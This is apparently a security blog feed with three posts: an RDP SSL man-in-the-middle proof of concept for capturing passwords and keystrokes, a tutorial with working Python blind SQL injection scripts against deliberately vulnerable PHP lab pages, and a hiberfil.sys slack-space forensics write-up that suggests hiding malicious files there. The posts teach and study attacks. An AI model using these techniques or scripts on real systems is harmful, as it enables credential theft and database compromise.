Channel: general – DiabloHorn

Quick POC to mitm RDP ssl


So the other day I stumbled upon this great article from Portcullis Labs. The article explains how you can man-in-the-middle an RDP SSL connection. This can be helpful in obtaining the user’s password, as Portcullis explains in their article. As far as I could tell they didn’t release their tool, so I decided to see if I could whip up a quick POC script with a twist of saving the entire decrypted stream to a pcap file. This would put you in the position to maybe retrieve more sensitive data than just the password. Turns out the only modification from regular SSL intercepting code is more or less the following:

    #read client rdp data
    serversock.sendall(clientsock.recv(19))
    #read server rdp data and check if ssl
    temp = serversock.recv(19)
    clientsock.sendall(temp)
    if(temp[15] == '\x01'):

As you can see, we just pass through the initial packet and then check the response packet for the ‘SSL’ byte before we start intercepting. The output is pretty boring, since everything is saved to the file ‘output.pcap’:

sudo ./rdps2rdp_pcap.py 
waiting for connection...
('...connected from:', ('10.50.0.123', 1044))
waiting for connection...
Intercepting rdp session from 10.50.0.123
some error happend
some error happend

You can ignore the errors, that’s just me being lazy for this POC. The output is saved in ‘output.pcap’ which you can then open with wireshark or further process to extract all the key strokes. If you want to play around with the POC you can find it on my github as usual. If you plan on extracting the key strokes make sure you look for the key scan codes and not for the hex representation of the character that the victim typed. In case you are wondering, yes, extracting the key strokes is left as an exercise for the user :)
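As a starting point for that exercise, here is a minimal, hypothetical sketch of mapping key-down scan codes back to characters. The table and function names are made up for illustration; it covers only a handful of keys from the PC/AT set-1 layout and ignores shift state and key-up events entirely:

```python
# Hypothetical illustration: a tiny subset of set-1 keyboard scan codes.
# A real decoder needs the full table plus shift/caps state tracking.
SCANCODE_MAP = {
    0x1E: 'a', 0x30: 'b', 0x2E: 'c', 0x20: 'd', 0x12: 'e',
    0x10: 'q', 0x11: 'w', 0x1F: 's', 0x14: 't',
}

def decode_scancodes(codes):
    """Translate a list of key-down scan codes to characters."""
    return ''.join(SCANCODE_MAP.get(c, '?') for c in codes)
```

Feeding it the scan codes extracted from the decrypted stream would then yield the typed text, one character per key-down event.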

 


Filed under: general, security Tagged: mitm, pcap, rdp, scapy

Writing your own blind SQLi script

$
0
0

We all know that sqlmap is a really great tool which has a lot of options that you can tweak and adjust to exploit the SQLi vuln you just found (or that sqlmap found for you). On rare occasions however you might want to just have a small and simple script or you just want to learn how to do it yourself. So let’s see how you could write your own script to exploit a blind SQLi vulnerability. Just to make sure we are all on the same page, here is the blind SQLi definition from OWASP:

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application’s response.

You can also roughly divide the exploiting techniques into two categories (like OWASP does), namely:

  • content based
    • The page output tells you if the query was successful or not
  • time based
    • Based on a time delay you can determine if your query was successful or not

Of course you have dozens of variations on the above two techniques, I wrote about one such variation a while ago. For this script we are going to just focus on the basics of the mentioned techniques, if you are more interested in knowing how to find SQLi vulnerabilities you could read my article on Solving RogueCoder’s SQLi challenge. Since we are only focusing on automating a blind sql injection, we will not be building functionality to find SQL injections.

Before we even think about sending SQL queries to the servers, let’s first setup the vulnerable environment and try to be a bit realistic about it. Normally this means that you at least have to login, keep your session and then inject. In some cases you might even have to take into account CSRF tokens which, depending on the implementation, means you have to parse some HTML before you can send the request. This will however be out of scope for this blog entry. If you want to know how you could parse HTML with python you could take a look at my credential scavenger entry.

If you just want the scripts you can find them in the example_bsqli_scripts repository on my github, since this is an entry on how you could write your own scripts all the values are hard coded in the script.

The vulnerable environment

Since we are doing this for learning purposes anyways, let’s create almost everything from scratch:

  • sudo apt-get install mysql-server mysql-client
  • sudo apt-get install php5-mysql
  • sudo apt-get install apache2 libapache2-mod-php5

Now let’s write some vulnerable code and abuse the mysql database and its tables for our vulnerable script, which saves us the trouble of creating a test database.

pwnme-plain.php

<?php

$username = "root";
$password = "root";

$link = mysql_connect('localhost',$username,$password);

if(!$link){
    die(mysql_error());
}

if(!mysql_select_db("mysql",$link)){
    die(mysql_error());
}

$result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link);

echo "<html><body>";
if(mysql_num_rows($result) > 0){
    echo "User exists<br/>";
}else{
    echo "User does not exist<br/>";
}

if($_GET['debug'] === "1"){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['user'] . ":" . $row['host'] . "<br/>";
    }
}
echo "</body></html>";
mysql_free_result($result);
mysql_close($link);
?>

As you can see, if you give it a valid username it will say the user exists and if you don’t give it a valid username it will tell you the user doesn’t exist. If you need more information you can append a debug flag to get actual output. You probably also spotted the SQL injection, which you can for example exploit like this:

http://localhost/pwnme-plain.php?name=x' union select 1,2--+

Which results in the output:

User exists

and if you mess up the query or the query doesn’t return any row it will result in:

User does not exist

Sending and receiving data

We are going to use the python package requests for this. If you haven’t heard of it yet, it makes working with http stuff even easier than urllib2. If you happen to encounter weird errors with the requests library you might want to install the library yourself instead of using the one provided by your distro.

To make a request using GET and getting the page content you’d use:

print requests.get("http://localhost/pwnme-plain.php").text

If you want to pass in parameters you’d do it like:

urlparams = {'name':'root'}
print requests.get("http://localhost/pwnme-plain.php",params=urlparams).text

Which ensures that the parameters are automatically encoded.

To make a request using POST you’d use:

postdata = {'user':'webuser','pass':'webpass'}
print requests.post("http://localhost/pwnme-login.php",data=postdata).text

That’s all you need to start sending your SQLi payload and receiving the response.

Content based automation

For content based automation you basically need a query which will change the content based on the output of the query. You can do this in a lot of ways, here are two examples:

  • display or don’t display content
    • id=1 and 1=if(substring((select @@version),1,1)=5,1,2)
  • display content based on the query output
    • id=1 + substring((select @@version),1,1)

For our automation script we will choose the first way of automating it, since it depends less on the available content. The first thing you need is a “universal” query which you use as the base to execute all your other queries. In our case this could be:

root' and 1=if(({PLACEHOLDER})=PLACEHOLDERVAR,1,2)--+

With the above query we can decide what we want to display. If we want to display the wrong content, we have to replace the PLACEHOLDER text and PLACEHOLDERVAR with something that will make the ‘if clause’ choose ‘2’, for example:

root' and 1=if(substring((select @@version),1,1)=20,1,2)--+

Since there is no mysql version 20 this will lead to a query that ends up being evaluated as:

root' and 1=2

Which results in a False result, thus displaying the wrong content, in our case ‘User does not exist’. If on the other hand we want the query to display the good content we can just change it to:

root' and 1=if(substring((select @@version),1,1)=5,1,2)--+

Which of course will end up as:

root' and 1=1

Thus resulting in True and displaying the good content ‘User exists’. When writing your own automation script you have to somehow strike the balance between a quick and dirty script to get you the desired result and a somewhat reusable script. For this blog entry we are going to hard code several things into the script (since we are not really reusing them), one of them being the base query. The first function in our script is thus a function that sends the query to the server and checks for the good content, this can be as simple as:

BASE_URL = "http://localhost/pwnme-plain.php"
SUCCESS_TEXT = "user exists"
URL_PARAMS = {'name':None}

def get_query_result(data):
    global URL_PARAMS

    URL_PARAMS['name'] = data
    pagecontent = requests.get(BASE_URL, params=URL_PARAMS).text
    if SUCCESS_TEXT in pagecontent.lower():
        return True
    else:
        return False

At this point we know how to send data to the server and we know our base query; the next thing we need is something to determine the result of our query. One of the basic building blocks can be the substring function, as you’ve seen in the code snippets before. The easy way is then to compare every byte with a range of bytes to see if it matches. We however are going to choose a slightly more difficult solution and use a binary search, since it’s way faster than trying each possible byte. If you are not familiar with a binary search, read up on it here. So the bulk of our script is contained in the following function:

BASE_QUERY = "root' and 1=if(({}){}{},1,2)-- "

def binsearch(query,sl,sh):
    searchlow = sl
    searchhigh = sh
    searchmid = 0
    while True:
        searchmid = (searchlow + searchhigh) / 2
        if get_query_result(BASE_QUERY.format(query, "=", searchmid)):
            break
        elif get_query_result(BASE_QUERY.format(query, ">", searchmid)):
            searchlow = searchmid + 1
        elif get_query_result(BASE_QUERY.format(query, "<", searchmid)):
            searchhigh = searchmid
    return searchmid
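To sanity-check that search logic without a web server, you can swap the HTTP oracle for a local comparison. This is a quick offline sketch, not part of the original script; the SECRET value and function names are made up for illustration:

```python
# Offline check of the binary search: answer the =, > and < questions
# against a local secret value instead of the blind SQLi oracle.
SECRET = 42  # stand-in for e.g. the ord() value of a character in the DB

def local_oracle(op, guess):
    return {'=': SECRET == guess, '>': SECRET > guess, '<': SECRET < guess}[op]

def binsearch_local(sl, sh):
    low, high = sl, sh
    while True:
        mid = (low + high) // 2
        if local_oracle('=', mid):
            return mid          # found the exact value
        elif local_oracle('>', mid):
            low = mid + 1       # secret is above the midpoint
        elif local_oracle('<', mid):
            high = mid          # secret is below the midpoint
```

Each `local_oracle` call corresponds to one HTTP request in the real script, which is why the binary search pays off so quickly compared to trying every byte value.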

The only thing left to do now is to carefully choose our ‘wrapper’ functions that will receive our desired SQL statement to be executed within the injection:

def querylength(query):
    return binsearch("length(({}))".format(query),0,100)

def execquery(query):
    fulltext = ""
    qlen = querylength(query) + 1
    print "Retrieving {} bytes".format(qlen-1)
    for i in range(1,qlen):
        sys.stdout.write(chr(binsearch("ord(substring(({}),{},1))".format(query,i),0,127)))
    print ""

Since we chose a base query that only handles numbers in its comparison, it will work fine for a SQL query which returns a number. If the query however returns a character, we need to wrap that query with ord() to make sure it also only returns numbers. If you put this all together and fix it to accept the query as a parameter, then your script input/output will look like this:

./ebs-content.py "select @@version"
Retrieving 23 bytes
5.5.38-0ubuntu0.12.04.1

That’s it for automating a blind SQL injection using a content based technique. You could also use fuzzy hashing with a reasonable threshold instead of hard coding the good content response.

Time based automation

The concept for time based exploitation is basically the same as for content based, except that you rely on time discrepancies to determine the TRUE/FALSE portion of your query result. Since it’s time based it automatically means it will also be slower than content based, thus forcing us to be as efficient as possible. For this we are going to make sure that every request counts by reading out each byte on a bit by bit basis. This is one of the more common techniques and it more or less guarantees that you can read any byte with eight requests. It can of course still fail if the connection or the server becomes unstable for some reason and forces you to repeat a request. The essence of the technique consists of testing each bit to see if it’s 1 or 0 and based on the answer rebuilding the byte. There are a lot of different ways to do this, we are going to choose the following one:

select if(substring(bin(ascii(substring((select @@version),1,1))),1,1)=TRUE,sleep(10),0)

As you can see, the query tests a specific bit and returns the result. Depending on whether it’s 1 (TRUE) or 0 (FALSE) we either sleep for a period of time or we return immediately. That wasn’t so hard now was it? You can now just walk through the eight bits and check if they are set or not. Except it won’t work, check this out:

mysql> select bin(substring((select @@version),1,1));
+----------------------------------------+
| bin(substring((select @@version),1,1)) |
+----------------------------------------+
| 101                                    |
+----------------------------------------+
1 row in set (0.00 sec)

Hmmm shouldn’t the result be a full byte? Seems like the output is truncated by the bin() function. MySQL provides a function to fix it known as lpad(), let’s try that again:

mysql> select lpad(bin(substring((select @@version),1,1)),8,'0');
+----------------------------------------------------+
| lpad(bin(substring((select @@version),1,1)),8,'0') |
+----------------------------------------------------+
| 00000101                                           |
+----------------------------------------------------+
1 row in set (0.00 sec)
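If you want to double-check that padding behaviour outside MySQL: bin() numeric-casts the string ‘5’ (the first character of the version string) to the number 5, hence ‘101’, and lpad() then left-pads it to a full byte. A quick Python sanity check (not part of the original scripts):

```python
# Reproduce MySQL's bin() and lpad(bin(...),8,'0') for the byte under test.
digit = '5'                          # substring((select @@version),1,1)
bits = format(int(digit), 'b')       # like bin(): numeric cast, no padding
padded = format(int(digit), '08b')   # like lpad(bin(...),8,'0'): full 8 bits
```

The padded form is what we need, since the bit-by-bit extraction below assumes exactly eight bit positions per byte.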

Now that looks much better, since it actually has 8 bits. So after this little hiccup let’s focus on the functions we need; for example, a function to measure how long it takes to execute a normal query. How else would we determine how long the sleep() delay should be? After all we don’t want to wait weeks for the output of a single character. The function looks like this:

def get_timing():
    times = list()
    print "Calculating average times"
    for i in range(10):
        URL_PARAMS['name'] = 'root'
        r = requests.get(BASE_URL,params=URL_PARAMS)
        times.append(r.elapsed.seconds)
        time.sleep(randint(1,3))
        print r.elapsed.seconds
    print "Average: %s" % (sum(times) / len(times))
    return (sum(times) / len(times))

We could improve the function by also keeping track of the slowest response, but for now this will do. Have you noticed anything interesting? The requests library takes care of measuring the request timing; without it we’d have had to wrap the request in our own time measuring function. You might be wondering why I have a random delay after each request; for some odd reason I thought that could help to make the measurement more realistic, not sure if it actually works so feel free to remove it. We also need to convert the sleep() delay into meaningful bits and eventually a full byte, we’ll do that with the following function:

def getbyte(query):
    bytestring = ""
    for i in range(1,9):
        if get_query_result(BASE_QUERY.format(query,i)):
            bytestring += "1"
        else:
            bytestring += "0"
    return int(bytestring,2)
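The bit-reconstruction loop can also be tested offline. In this sketch (names and the known byte are made up for illustration) a fake oracle answers whether bit i of a known byte is set, the same question the sleep()-based query answers over the network:

```python
# Offline check of the getbyte() idea: rebuild a byte from single-bit answers.
KNOWN = 0x35  # ascii '5', first byte of the version string

def bit_oracle(i):
    # Is bit i (1-indexed, MSB first, as lpad/bin produce) of KNOWN set?
    return format(KNOWN, '08b')[i - 1] == '1'

def getbyte_local():
    bytestring = ''
    for i in range(1, 9):
        bytestring += '1' if bit_oracle(i) else '0'
    return int(bytestring, 2)
```

Swap `bit_oracle` for the timing-based `get_query_result` and you have the real thing: eight requests, one reconstructed byte.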

That looks pretty doable, right? Eventually you’ll end up with a string of bits (eight total) which you then convert to a byte. The last function that we need is the one that performs the request and determines if the bit was set or not, which looks like this:

def get_query_result(data):
    global URL_PARAMS
    reqtime = 0

    URL_PARAMS['name'] = data
    r = requests.get(BASE_URL, params=URL_PARAMS)
    reqtime = r.elapsed.seconds
    pagecontent = r.text
    if reqtime > BASE_TIME:
        return True
    else:
        return False

You might notice that I used the ‘r.elapsed.seconds’, if you want more precision you could combine it with ‘r.elapsed.microseconds’. Basically that’s it, you can then reuse most of the ‘content based automation’ the only big changes are the queries and some for loops, here’s the basic query:

BASE_QUERY = "root' and 1=if(substring({},{},1)=TRUE,sleep(1),2)-- "

The most important part of the base query is to get the timing right, since it should be slower than the base request but not so slow as to take an eternity to complete. To get the output length of, let’s say, “select @@version” you’d use a function like this:

def querylength(query):
    return getbyte("lpad(bin(length(({}))),8,'0')".format(query))

and to get the actual content of “select @@version” you’d use a function like this:

def execquery(query):
    fulltext = ""
    qlen = querylength(query) + 1
    print "Retrieving {} bytes".format(qlen-1)
    for i in range(1,qlen):
        sys.stdout.write(chr(getbyte("lpad(bin(ascii(substring(({}),{},1))),8,'0')".format(query,i))))
        sys.stdout.flush()
    print ""

This is it for the time based automation, like you can see it’s really similar to the content based automation except that you determine the True/False response based on time instead of basing it on some content that is returned by the page.

Wrapping automation with login support

Since we are using the requests library this is pretty easy, all you need to do is wrap the original request in a Session object. The rest of the complicated session handling is performed by the requests library, you can even find the example on their website. First however let’s upgrade our PHP script with some kind of login logic:

pwnme-login.php

<?php
/*
    DiabloHorn https://diablohorn.wordpress.com
*/
$username = "root";
$password = "root";

$link = mysql_connect('localhost',$username,$password);

if(!$link){
    die(mysql_error());
}

if(!mysql_select_db("mysql",$link)){
    die(mysql_error());
}

session_start();

if($_SERVER["REQUEST_METHOD"] == "POST"){
    if($_POST['user'] === "webuser" && $_POST['pass'] === "webpass"){
        $_SESSION['login'] = "ok";
        echo "login OK";
    }
}
if($_SESSION['login'] === "ok"){
    $result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link);

    echo "<html><body>";
    if(mysql_num_rows($result) > 0){
        echo "User exists<br/>";
    }else{
        echo "User does not exist<br/>";
    }

    if($_GET['debug'] === "1"){
        while ($row = mysql_fetch_assoc($result)){
            echo $row['user'] . ":" . $row['host'] . "<br/>";
        }
    }
    echo "</body></html>";
    mysql_free_result($result);
}else{
    echo "please login first";
}

mysql_close($link);
?>

If you use the previous scripts that we made, they won’t work on the above PHP, since we need to login, or in other words we need to send the received session id back to the server. So let’s add that to our script:

URL_SESSION = requests.Session()

def do_login():
    global URL_SESSION

    postdata = {'user':'webuser','pass':'webpass'}
    #we assume the login will work
    print URL_SESSION.post("http://localhost/pwnme-login.php",data=postdata).text

The only thing you have to do now is to make sure that the “get_query_result()” function uses the URL_SESSION object instead of the “requests” object and don’t forget to actually call the do_login() function before calling the execquery() function.

Conclusion

Hope you enjoyed this blog entry and that you found it useful to know how to write your own blind SQLi automation scripts. You will probably almost never need them since sqlmap is pretty versatile, but I’ve found myself in situations where I needed my own quick and dirty scripts to get the job done. You could always build upon these scripts and implement a CSRF capable script yourself.

Filed under: general, security Tagged: blind injection, python, sql injection, sqli

Parsing the hiberfil.sys, searching for slack space

$
0
0

Implementing functionality that is already available in an existing tool is something that has always taught me a lot, so I keep on doing it when I encounter something I want to fully understand. In this case it concerns the ‘hiberfil.sys’ file on Windows. As usual I first stumbled upon the issue and started writing scripts, to later find out someone had written a nice article about it, which you can read here (1). For the sake of completeness I’m going to repeat some of the information in that article and hopefully expand upon it; I mean, it’d be nice if I could use this entry as a reference page in the future for when I stumble upon hibernation files again. Our goal for today is going to be to answer the following question:

What’s a hiberfil.sys file, does it have slack space and if so how do we find and analyze it?

That question will hopefully be answered in the following paragraphs; we are going to look at the hibernation process, the hibernation file, its file format structure, how to interpret it and finally analyze the found slack space. As usual you can skip the post and go directly to the code.

Hibernation process

When you put your computer to ‘sleep’ there are actually several ways in which the operating system can do this, one of them being hibernation. The hibernation process puts the contents of your memory into the hiberfil.sys file so that the state of all your running applications is preserved. By default when you enable hibernation the hiberfil.sys is created and filled with zeros. To enable hibernation you can run the following command in an elevated command shell:

powercfg.exe -H on

If you want to also control the size you can do:

powercfg.exe -H -Size 100

An interesting fact to note is that Windows 7 sets the size of the hibernation file to 75% of your memory size by default. According to Microsoft documentation (2) this means that the hibernation process could fail if it’s not able to compress the memory contents to fit in the hibernation file. This of course is useful information, since it indicates that the contents of the hibernation file are compressed, which usually makes basic analysis like ‘strings’ pretty useless.

If you use strings, always go for ‘strings -a <inputfile>’; read this post if you are wondering why.

The hibernation file usually resides in the root directory of the system drive, but it’s not fixed. If an administrator wants to change the location he can do so by editing the following registry key as explained by this (3) msdn article:

Key Name: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\
Value Name: PagingFiles
Type: REG_MULTI_SZ
Data: C:\pagefile.sys 150 500
In the Data field, change the path and file name of the pagefile, along with the minimum and maximum file size values (in megabytes).

So if you are performing an incident response or forensic investigation, make sure you check this registry key before you draw any conclusions when the hiberfil.sys file is absent from its default location. The same goes for creating memory images using hibernation: make sure you get the full 100% and write it to a location which doesn’t destroy evidence or where the evidence has already been collected.

Where does the slack space come from, you might ask? That’s an interesting question, since you would assume that each time the computer goes into hibernation mode it would create a new hiberfil.sys file, but it doesn’t. Instead it overwrites the current file with the contents it wants to save. This is what causes slack space: if the new data is smaller than the data already in the file, the old data at the end of the file will still be there, even though it’s no longer referenced by the newly written headers.

From a forensic standpoint that’s pretty interesting, since the unreferenced but still available data might contain important information to help the investigation along. If you are working with tools that automatically import, parse or analyse the hiberfil.sys file, you should check / ask / test how they handle slack space. In the best case scenario they will inform you about the slack space and try to recover the information, in a less ideal scenario they will inform you that there is slack space but that they are not able to handle the data, and in the worst case scenario they will just silently ignore the data and tell you the hibernation file has been processed successfully.

Hibernation File structure

Now that we know that slack space exists, how do we find and process it? First of all we should start with identifying the file format to be able to parse it, which unfortunately isn’t available from Microsoft directly. Luckily for us we don’t need to reverse it (yet?) since there are pretty smart people out there who have already done so. You could read this or this or this to get some very good information about the file format. Let’s look at the parts that are relevant for our purpose of retrieving and analyzing the hibernation slack space. The general overview of the file format is as follows:

[Image: Hibernation File Format (9)]

As you can see in the image above, the file format seems reasonably easy to parse if we have the definition of all the headers. The most important headers for us are the “Hibernation File Header” which starts at page zero, the “Memory Table” header which contains a pointer to the next table and the number of Xpress blocks, and the “Xpress image” header which contains the actual memory data. The last two headers are the ones that create the chain we want to follow, to be able to distinguish between referenced Xpress blocks and blocks which are just lingering around in slack space. The thing to keep in mind is that even though the “Hibernation File Header” contains a lot of interesting information for building a robust tool, it might not be present when we recover a hibernation file. The reason for this is that when Windows resumes from hibernation the first page is zeroed. Luckily it isn’t really needed if you just assume a few constants, like the page size being 4096 bytes, and find the first Xpress block with a bit of searching around. Let’s have a look at the headers we have been talking about:

typedef struct
{
    ULONG Signature;
    ULONG Version;
    ULONG CheckSum;
    ULONG LengthSelf;
    ULONG PageSelf;
    UINT32 PageSize;
    ULONG64 SystemTime;
    ULONG64 InterruptTime;
    DWORD FeatureFlags;
    DWORD HiberFlags;
    ULONG NoHiberPtes;
    ULONG HiberVa;
    ULONG64 HiberPte;
    ULONG NoFreePages;
    ULONG FreeMapCheck;
    ULONG WakeCheck;
    UINT32 TotalPages;
    ULONG FirstTablePage;
    ULONG LastFilePage;
    PO_HIBER_PERF PerfInfo;
    ULONG NoBootLoaderLogPages;
    ULONG BootLoaderLogPages[8];
    ULONG TotalPhysicalMemoryCount;
} PO_MEMORY_IMAGE, *PPO_MEMORY_IMAGE;

The FirstTablePage member is the most important one for us, since it contains a pointer to the first memory table. Then again, knowing that the first page might be wiped out, do we really want to parse it when it’s available? Let’s look at the memory table structure:

struct MEMORY_TABLE
{
    DWORD PointerSystemTable;
    UINT32 NextTablePage;
    DWORD CheckSum;
    UINT32 EntryCount;
    MEMORY_TABLE_ENTRY MemoryTableEntries[EntryCount];
};

That’s neat: as expected it contains the NextTablePage member, which points to the next memory table. Directly following the memory table we’ll find the Xpress blocks, which have the following header:

struct IMAGE_XPRESS_HEADER
{
    CHAR Signature[8] = 81h, 81h, "xpress";
    BYTE UncompressedPages = 15;
    UINT32 CompressedSize;
    BYTE Reserved[19] = 0;
};

It seems this header contains the missing puzzle pieces, since it tells us how big each Xpress block is. So if you followed along, here is the big picture of how it all fits together, to parse the file and discover if there is any slack space and if so how much.

  • Find the first MemoryTable
  • Follow pointers until you find the last one
  • Follow all the xpress blocks until the last one
  • Calculate distance from the end of the last block until the end of the file
  • Slack space found

There are a few caveats that we need to be aware of (you know this if you already read the references):

  • Every OS version might change the structures and thus their size
  • Everything is page aligned
  • Every memory table entry should correspond to an Xpress block
  • To get the actual compressed size, calculate as follows:
    • CompressedSize / 4 + 1, rounded up to a multiple of 8
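That last caveat is easy to get wrong, so here it is as code. This is a minimal sketch based purely on the formula stated above (the helper name is made up, and the formula itself comes from the referenced reversing write-ups):

```python
def xpress_block_size(compressed_size_field):
    """On-disk size of an Xpress block from the header's size field:
    CompressedSize / 4 + 1, rounded up to the next multiple of 8."""
    size = compressed_size_field // 4 + 1
    return (size + 7) & ~7  # round up to a multiple of 8
```

Getting this rounding wrong means every subsequent seek lands mid-block, so it is worth verifying against a known-good hibernation file.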

Parsing and interpreting the hibernation file

The theory sounds pretty straightforward, right? The practice however actually made me waste some hours. For one, I was assuming the “Hibernation File Header” to be the same across all operating systems, stupid I know. I just didn’t realize it until I was brainstorming with Mitchel Sahertian about why the pointers were not pointing at the correct offsets. This however taught me that when you are writing some proof of concept code you should parse the entire structure, not just reference the structure members you are interested in. When you parse the entire structure it gives you more context and the ability to quickly spot that a lot of members contain garbage data. When you are just directly referencing a single member, like I was doing, you lose the context and you only get to see one pointer, which could virtually be anything. So even after learning this lesson I still decided to implement the script by just parsing the minimum needed data, even though I used full structures while debugging the code. The most important snippets of the script are highlighted hereafter; the script probably contains bugs, although in the few tests I’ve performed it seems to work fine:

Finding the first MemoryTable, first we search for an xpress block and then we subtract a full page from it.

    firstxpressblock = fmm.find(XPRESS_SIG)
    print "Found Xpress block @ 0x%x" % firstxpressblock
    firstmemtableoffset = firstxpressblock - PAGE_SIZE

Finding the pointer to the next MemoryTable in a dynamic way, we want to avoid reversing this structure for every new operating system version or service pack. We start at the beginning of the MemoryTable and force-interpret every four bytes as a pointer, then we check the pointer destination. The pointer destination is checked by verifying that an xpress block follows it immediately, if so it’s valid.

def verify_memorytable_offset(offset):
    """
        Verify the table pointer to be valid
        valid table pointer should have an Xpress block
        on the next page
    """
    fmm.seek(offset+PAGE_SIZE)
    correct = False
    if fmm.read(8) == XPRESS_SIG:
        correct = True
    fmm.seek(offset)
    return correct

#could go horribly wrong, seems to work though
def find_memorytable_nexttable_offset(data):
    """
        Dynamically find the NextTablePage pointer
        Verification based on verify_memorytable_offset function
    """
    for i in range(len(data)):
        toffset = unpack('<I',data[i:(i+4)])[0]*PAGE_SIZE
        if verify_memorytable_offset(toffset):
            return i

After we find the last MemoryTable, we just have to walk all the Xpress blocks until the last one; from its end till the end of the file is the slack space we found:

    while True:
        xsize = xpressblock_size(fmm,nxpress)
        fmm.seek(xsize,1)
        xh = fmm.read(8)
        if xh != XPRESS_SIG:
            break
        fmm.seek(-8,1)
        if VERBOSE:
            print "Xpress block @ 0x%x" % nxpress
        nxpress = fmm.tell()
    print "Last Xpress block @ 0x%x" % nxpress
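Once the end of the last Xpress block is known, the slack space calculation itself is trivial: everything from there to the end of the file. A minimal sketch (function name made up) that reproduces the numbers the script prints at the end of its run:

```python
def slack_info(filesize, slack_start):
    """Return (slack size in bytes, slack size in whole megabytes),
    where slack_start is the offset right after the last Xpress block."""
    slack = filesize - slack_start
    return slack, slack // (1024 * 1024)
```

Plugging in the file size and slack start offset from the sample run below yields the same 765 megabytes of slack space the script reports.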

Analyzing the found hibernation slack space

So after all this, how do we even know this slack space is really there, and can we even extract something useful from it? First of all let’s compare our output to that of volatility; after all it’s the de facto, and in my opinion best, memory analysis tool out there. One of the things you can for example do with volatility is convert the hibernation file into a raw memory file; volatility doesn’t support direct hibernation file analysis. Before converting it however I added two debug lines to the file ‘volatility/plugins/addrspaces/hibernate.py’

Printing the memory table offset:

NextTable = MemoryArray.MemArrayLink.NextTable.v()
print "memtableoff %x" % NextTable

# This entry count (EntryCount) should probably be calculated

Printing the xpress block offset:

XpressHeader = obj.Object("_IMAGE_XPRESS_HEADER", XpressHeaderOffset, self.base)
XpressBlockSize = self.get_xpress_block_size(XpressHeader)
print "xpressoff %x" % XpressHeaderOffset
return XpressHeader, XpressBlockSize

With this small modification I’m able to compare the output of my script to the output of volatility:

Volatility output:

 ./vol.py -f ~/p/find_hib_slack/hibfiles/a.sys --profile=Win7SP0x86 imagecopy -O ~/p/find_hib_slack/hibfiles/raw.a.img

[…]

memtableoff 10146
xpressoff 10147000
xpressoff 1014f770
xpressoff 101589f0
xpressoff 10160240
xpressoff 10166a98
xpressoff 1016c7a8
xpressoff 10172448
xpressoff 10179b60
xpressoff 1017ff50
xpressoff 10181af8
xpressoff 10181d58
xpressoff 10183790
xpressoff 101877e0
xpressoff 1018c290
xpressoff 10192270
xpressoff 10195890
xpressoff 1019b680
xpressoff 101a0d50
xpressoff 101a5258
xpressoff 101a8608
xpressoff 101aa3e8
xpressoff 101adc70
xpressoff 101b2de0

That looks pretty clear: the last MemoryTable is at page 0x10146 (byte offset 0x10146000) and the last xpress block is at offset 0x101b2de0.

My script:

./find_hib_slack.py hibfiles/a.sys

Last MemoryTable @ 0x10146000
Xpress block @ 0x10147000
Xpress block @ 0x1014f770
Xpress block @ 0x101589f0
Xpress block @ 0x10160240
Xpress block @ 0x10166a98
Xpress block @ 0x1016c7a8
Xpress block @ 0x10172448
Xpress block @ 0x10179b60
Xpress block @ 0x1017ff50
Xpress block @ 0x10181af8
Xpress block @ 0x10181d58
Xpress block @ 0x10183790
Xpress block @ 0x101877e0
Xpress block @ 0x1018c290
Xpress block @ 0x10192270
Xpress block @ 0x10195890
Xpress block @ 0x1019b680
Xpress block @ 0x101a0d50
Xpress block @ 0x101a5258
Xpress block @ 0x101a8608
Xpress block @ 0x101aa3e8
Xpress block @ 0x101adc70
Last Xpress block @ 0x101b2de0
Start of slack space @ 270223752
Total file size 1073209344
Slackspace size 765 megs

At least we know that the parsing seems to be OK, since our last MemoryTable offset and our last xpress offset match the ones from volatility. We can also see that the end of the last xpress block is way before the end of the file, which indicates that the space in between might contain some interesting data. From a memory forensics perspective it's logical that volatility doesn't parse this, since the chances of extracting any meaningful structured data from it are smaller than with a normal memory image or hibernation file. You can use the output to carve out the slack space with dd if you want to analyze it further, for example like this:

dd if=<inputfile> of=<slack.img> bs=1 skip=<start_of_slackspace>
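A side note on that dd invocation: bs=1 makes dd copy one byte at a time, which is painfully slow on a gigabyte-sized hiberfil. A small Python sketch that does the same carve in bigger chunks (file names and the start offset are up to you):

```python
def carve(infile, outfile, start, chunksize=1024 * 1024):
    """Copy everything from byte offset 'start' in infile into outfile."""
    with open(infile, 'rb') as src, open(outfile, 'wb') as dst:
        src.seek(start)
        while True:
            chunk = src.read(chunksize)
            if not chunk:
                break
            dst.write(chunk)
```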

The thing is, like with all slack space, it can contain virtually anything. If you are really lucky you'll find nice new MemoryTables and xpress blocks; if you are less lucky you'll only find partial xpress blocks. For now I've opted for medium optimism and assumed we'll at least be able to find full xpress blocks. So I wrote another script which you can use to extract and decompress blocks from a blob of data and write them to a file. After this you can try your luck with strings, for example, or the volatility plugins yarascan and psscan. Here is some example output:

./bulk_xpress_decompress.py hibfiles/a.sys 270223752

Advancing to offset 270223752
Xpress block @ 0x101b65c0 size: 20824
Xpress block @ 0x101bb718 size: 17760
Xpress block @ 0x101bfc78 size: 17240
Xpress block @ 0x101c3fd0 size: 20424
Xpress block @ 0x101c8f98 size: 21072
Xpress block @ 0x101ce1e8 size: 16712

The script also writes all the decompressed output to a file called 'decompressed.slack'. I use the decompression code from volatility; hope I didn't mess up any license requirements, since I just included it in its entirety.

Conclusion

Sometimes you really have to dive into a file format to fully understand it. It won't always end in glorious victory, but you'll learn a lot during the development of your own script. The slack space is also a nice place to store your malicious file. I'm taking a guess here, but I assume that if you enlarge the hibernation file, Windows will be fine with it. As long as the incident responder or forensic investigator doesn't look at it, you'll get away without your stash being discovered, due to the fact that most tools ignore the slack space.

References

  1. http://digital-forensics.sans.org/blog/2014/07/01/hibernation-slack-unallocated-data-from-the-deep-past
  2. http://download.microsoft.com/download/7/E/7/7E7662CF-CBEA-470B-A97E-CE7CE0D98DC2/HiberFootprint.docx
  3. http://msdn.microsoft.com/en-us/library/ms912851(v=winembedded.5).aspx
    • Change hibernation file location
  4. http://msdn.microsoft.com/en-us/library/windows/desktop/aa373229(v=vs.85).aspx
    • System power states
  5. http://lcamtuf.blogspot.nl/2014/10/psa-dont-run-strings-on-untrusted-files.html
  6. http://msdn.moonsols.com/
